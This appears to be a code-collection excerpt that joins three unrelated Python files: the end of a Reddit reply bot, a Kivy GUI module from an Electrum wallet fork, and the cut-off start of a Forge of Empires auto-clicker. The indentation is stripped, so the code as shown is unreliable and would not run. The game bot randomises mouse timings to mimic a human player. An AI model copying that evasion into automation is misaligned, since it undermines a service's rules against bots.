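# "user_agent": "...",
# "username": "...",
# "password": "...",
# "rates": {"uptime": 3600, "io": 60},
# "subreddits": ["..."],
# "ignored_users": ["..."],
# "ignored_subreddits": ["..."],
# "phrases": ["..."],
# "reply_message": ["line 1 of the reply, may reference {comment}"]
# }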
def log(message, args=None):
if args is None:
logger.info(message)
else:
logger.info(message.format(**args))
if __name__ == "__main__":
logging_format = logging.Formatter("[%(asctime)s] [%(threadName)s]: %(message)s")
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
file_logger = logging.handlers.TimedRotatingFileHandler("logs/output.log",
when="midnight",
interval=1)
file_logger.setFormatter(logging_format)
logger.addHandler(file_logger)
console_logger = logging.StreamHandler()
console_logger.setFormatter(logging_format)
logger.addHandler(console_logger)
bot = WeDidItReddit()
try:
bot.start()
except (KeyboardInterrupt, SystemExit):
bot.stop()
for file in bot.io:
if bot.io[file]["save"]:
log(bot.messages["saving"])
bot._save_file(file, bot.io[file]["attribute"])
log(bot.messages["saved"])
log(bot.messages["shutdown"])
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrumpq
from electrumpq.bitcoin import TYPE_ADDRESS
from electrumpq import WalletStorage, Wallet
from electrumpq_gui.kivy.i18n import _
from electrumpq.paymentrequest import InvoiceStore
from electrumpq.util import profiler, InvalidPassword
from electrumpq.plugins import run_hook
from electrumpq.util import format_satoshis, format_satoshis_plain
from electrumpq.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrumpq_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrumpq.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrumpq import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bpq':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBPQ')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
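# Worked example (illustrative; assumes the configured base unit maps to 5 decimal
# places, as mBTC does upstream, and an exchange rate of 100 fiat units per coin):
#   btc_to_fiat('0.5')  -> 50000 sat * 100 / 1e8 -> '0.05'
#   fiat_to_btc('0.05') -> int(1e8 * 0.05 / 100) = 50000 sat -> '0.5'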
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Orientation of the app window, derived from the window size.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrumpq.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bpq:'):
self.set_URI(data)
return
# try to decode transaction
from electrumpq.transaction import Transaction
from electrumpq.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrumpq.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrumpq.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrumpq.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
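# Typical call site (illustrative): a screen passes its handler as the callback,
# e.g. app.scan_qr(on_complete=app.on_qr). On non-Android platforms this is a no-op.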
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bpq: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of electrumpq. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrumpq.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
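# Example call (illustrative): show a transient hint near the bottom of the window:
#   self.show_info_bubble(text=_('Copied'), duration=2, arrow_pos='bottom_mid')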
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
FoE Bot.py
|
import pyautogui
from time import sleep
from random import randint
import threading
#opencv-python is required! (pip install opencv-python).
#functions to be run, you can change these!
collectGold = True #collect gold from buildings.
collectSupplies = True #collect supplies from buildings.
restartIdleBuildings = True #restart any idle building.
collectGoods = True #collect goods from buildings other than supplies and gold.
pressButtons = True #automatically aid other people and accept friend requests.
#One might need to change these based on screen resolution
ydiff1 = 25
ydiff2 = 50
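#The offsets above are click offsets in pixels and were tuned for one resolution.
#A rough way to scale them for a different screen height (hypothetical sketch, not
#part of the original script) would be:
#    screen_w, screen_h = pyautogui.size()
#    ydiff1 = round(25 * screen_h / 1080)
#    ydiff2 = round(50 * screen_h / 1080)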
pyautogui.FAILSAFE = False
lock = threading.Lock()
#Yes I know I'm a crappy programmer.
open("pause.txt", "w+").write("cont")
def processOutput(output):
#get coordinates to click from output
xcoord = int(output[0])
ycoord = int(output[1])
ycoord += ydiff1
#goto coordinates and click there
lock.acquire()
pyautogui.moveTo(xcoord, ycoord, duration=randint(5,15)/10)
sleep(randint(12,25)/100)
pyautogui.click()
pyautogui.moveRel(0, ydiff2, duration=randint(5,15)/20)
sleep(randint(6,12)/10/7)
pyautogui.click()
print("Bot has collected gold from a building.")
sleep(randint(80,100)/100)
pyautogui.typewrite(['esc'])
lock.release()
def processIdleOutput(output):
#get coordinates to click from output
xcoord = int(output[0])
ycoord = int(output[1])
ycoord += ydiff1
#goto coordinates and click there
lock.acquire()
pyautogui.moveTo(xcoord, ycoord, duration=randint(5,15)/10)
sleep(randint(12,25)/100)
pyautogui.click()
sleep(randint(70,90)/100)
pyautogui.typewrite(['1', '2', '3', '4', '5'])
pyautogui.moveRel(0, ydiff2, duration=randint(5,15)/20)
sleep(randint(6,12)/10/7)
pyautogui.click()
pyautogui.typewrite(['1', '2', '3', '4', '5'])
print("Bot has restarted a production building.")
sleep(randint(80,100)/100)
pyautogui.typewrite(['esc']) #for some reason [] are required around 'esc' to actually press the ESC button
lock.release()
def processButtonOutput(output,suppressESC):
lock.acquire()
#get coordinates to click from output
xcoord, ycoord, xcoord2, ycoord2 = output
#goto coordinates and click there
pyautogui.moveTo(randint(xcoord+1, xcoord+xcoord2-1), randint(ycoord+1, ycoord+ycoord2-1), duration=randint(5,15)/10)
sleep(randint(12,25)/100)
pyautogui.click()
print("Bot has clicked a button.")
if suppressESC == False:
sleep(randint(80,100)/100)
pyautogui.typewrite(['esc'])
lock.release()
def worker1(lock): #gold icons
while True:
output = pyautogui.locateOnScreen('gold1.png', confidence=0.905)
lock.acquire()
print("gold1:", output)
lock.release()
if output == None:
output = pyautogui.locateOnScreen('gold2.png', confidence=0.895)
lock.acquire()
print("gold2:", output)
